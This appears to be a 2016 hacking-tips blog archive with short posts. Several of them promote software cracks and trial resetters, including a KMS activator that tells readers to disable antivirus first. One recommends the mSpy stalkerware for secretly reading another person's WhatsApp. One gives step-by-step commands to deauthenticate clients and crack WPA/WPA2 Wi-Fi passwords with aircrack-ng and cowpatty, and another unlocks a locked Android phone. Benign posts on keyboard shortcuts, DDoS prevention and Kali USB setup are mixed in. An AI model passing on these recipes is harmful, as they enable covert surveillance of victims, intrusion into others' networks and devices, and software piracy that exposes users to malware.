Posts

Showing posts from 2016

WINDOWS AND OFFICE ACTIVATOR

Image
ANY WINDOWS AND OFFICE ACTIVATOR KMS AUTONET  using this software you can activate any windows and office versions except office 365 it is a very usefull software steps to be followed 1 first turn of your antivirus and then run the file 2 then click activation 3 then select windows or office whatever you wish to activate 4 that all 5 wait till you get the message product successfully activated click here to  download

kaspersky total security 2017 life time

Image
Kaspersky Total Security 2017 Download both the file from the given below install the software u will get 30 days free trail After completion of 30 days trail  Run the trail resetter and u will get 30 days more keep doing OFFICAIL TRAIL DOWNLAOD TRAIL RESETTER FOR BETTER UNDERSTANDING OF PROCESS WATCH THE VIDEO GIVEN IN TRAIL RESETTER

Internet Download Manager Latest

Image
               Internet Download Manager latest version v6.32 build 8 How To Install IDM: Download the rar file from  HERE   Download IDM 6.30 Build 2 full  from below link. Now uninstall an old version of IDM from your PC. Then disconnect your Internet connect. Extract the downloaded files with WinRAR tool. Open downloaded folder and run IDMan.exe. After the  installation and exit idm from tray icons Open crack folder and copy the idm.exe click on shortcut in crack folder and paste the copied file click replace All Done. Enjoy!!! Download winrar from here
Image
40 most common computer shortcuts Google Chrome 1. To open Chrome’s built-in task manager: Press  Shift  +  Esc . Extremely useful when Chrome freezes. 2. To remove specific suggestion: Select the suggestion, then press  Shift  +  Delete . 3. To drag multiple tabs to a new window: Press  Ctrl  +  Click  on tabs  you want to move. Do the same to move multiple tabs to an existing window. 4. To scroll horizontally: Press  Shift  +  Scroll . Any Browsers 5. To access your address bar directly: Press  F6  or  Ctrl  +  L . 6. To access blocked web page: Go to  Google Translate , paste the URL, select source language as other language, select destination language as the web page’s language, click  Translate . Free web proxy. 7. To close a tab:  Middle click  on it. 8. To view articles with slideshows or multiple pages: Press  Print  or  Ctrl  +  P . 9. To open all web pages of a bookmark folder:  Middle click  on the folder. 10. To reset to the default Wind
       Need to Hack WhatsApp Account? 1. WhatsApp Hack using a Spying App:  The Easiest Way Even though there are several ways to hack WhatsApp, using a spy app is by far the most simple and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on mobile. Out of several apps out there, mSpy is one of my favorite one to hack WhatsApp: mSpy Features : Hack phone Calls and Text Messages. Hack WhatsApp, Skype and other popular messengers. Track Real-Time Location with GPS Tracker. Spy on Contact List and Web Browsing activities. Monitor Emails, Pictures and Videos. Operates in Hidden Mode and remains Undetected! No Rooting Required! How to Hack WhatsApp with this App? Download and Install the app on to the target phone which takes not more than a minute. After this is done, the app silently records
Image
How to join various video files into one video file using command prompt..? In this article I’m going to show you how to join different video  files  like as MPEG, DAT, MPG, mp4, AVI etc.  and  convert it one video. You can  join  your video files using just the windows Command Prompt. No need of any  video  joining software’s. The best method to follow is shown below. Step-1: For example if you have 3 videos in your hard drive root  drive : video1.mpg, video2.mpg and video3.mpg just rename them to a, b, and c ( just  the letter without the file extension). Example: Rename  ®  video1.mpg  ®  a ( without  . mpg ) Rename  ®  video2.mpg  ®  b (without  . mpg ) Rename  ®  video3.mpg  ®  c (without  . mpg ) Step 2: Now open Command Prompt (  winkey  + R) or Start–>Run–>type “cmd”. Step 3: Then type your location like “C: , D: , E: etc.” File location Screenshot Step 4: Type this code:  ®  Copy /b a + b + c videoname.mpg and press enter
Image
                     Basic Tips To Prevent A DDoS Attack Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is! Understanding DDOS Attack A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hiv

How to Hack any Android mobile

Unlock Pattern Lock On Android Without Losing Data Download  Aroma File Manager. You android device either locked by pattern lock or password lock. A memory card for android device. Step 1.  After downloading  Aroma File Manager,  place it in your memory card (SD card). Insert the memory card into your locked android device. Step 2.  Open  Stock Recovery Mode  with reboot your android device and pressing Power Key and Volume up key simultaneously. Different phones may be have different methods to open stock recovery mode so if you face any problem Google it. Step 3.  After entering into recovery mode use Volume+ and Volume- buttons to scroll up and down. For select use middle button. Step 4.  From there click on  “Install Zip from SD Card”  and give a path to install  “Aroma File Manager”  from SD card. Step 5.  After installing, it will open in recovery mode. Step 6.  From the Aroma File Manager navigate to  settings  >> go to bottom and click on “Automount a
TO BOOT KALI LINUX USING USB  >>first connect the usb to your pc and then power on the system >>then click f12 or f10 based on the system you are using. >>so you will be entering the boot menu >>then select the USB and then click enter and  >>thats it now u can use kali linux
Image
How to create a KALI LINUX LIVE USB A  verified  copy of the appropriate ISO image of the latest Kali build image for the system you’ll be running it on: see the details on  downloading official Kali Linux images . If you’re running under Windows, you’ll also need to download the  Win32 Disk Imager  utility.  A USB thumb drive, 4GB or larger. (Systems with a direct SD card slot can use an SD card with similar capacity. The procedure is identical.) Kali Linux Live USB Install Procedure Creating a Bootable Kali USB Drive on Windows Plug your USB drive into an available USB port on your Windows PC, note which drive designator (e.g. “F:\”) it uses once it mounts, and launch the Win32 Disk Imager software you downloaded. Choose the Kali Linux ISO file to be imaged and verify that the USB drive to be overwritten is the correct one. Click the “Write” button. Once the imaging is complete, safely eject the USB drive from the Windows machine. You can now use the USB device to boot

Hack WPA & WPA2 USING KALI LINUX

COMMANDs TO CRACK WPA & WPA2 using kali linux: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  crack wpa/wpa2-with-cowpatty-and-negpmk-on-kali-linux airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0  cowpatty -f darkc0de.lst -r latesthackingnews -s [ESSID of the wifi] genpmk -f darkc0de.lst -d pregendump -s [ESSID of the wifi] cowpatty -d pregendump -r latesthackingnews-01.cap -s [ESSID of the wifi]  sudo ifconfig wla
Image
BRUTE FORCE Cracking WPA/WPA2 – PSK Encryption I’m going to hack into a Wi-Fi hotspot that I just set up, named – Anonymus. Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device. Here, we only need (wlan0) which is our Wi-Fi card, so we can disable the others by doing “ifconfig <name of the interface> down”. (“lo” does no matter)… Now, we type “airmon-ng start wlan0” (airmon-ng is just a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring) It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by entering “kill <process ID>”. Now if we do “ifconfig”, it should show us the newly made monitoring interface “mon0”. Then, put in, “airodump-ng mon0”. In the screenshot below, the highlighted bssid is our target (and it is my o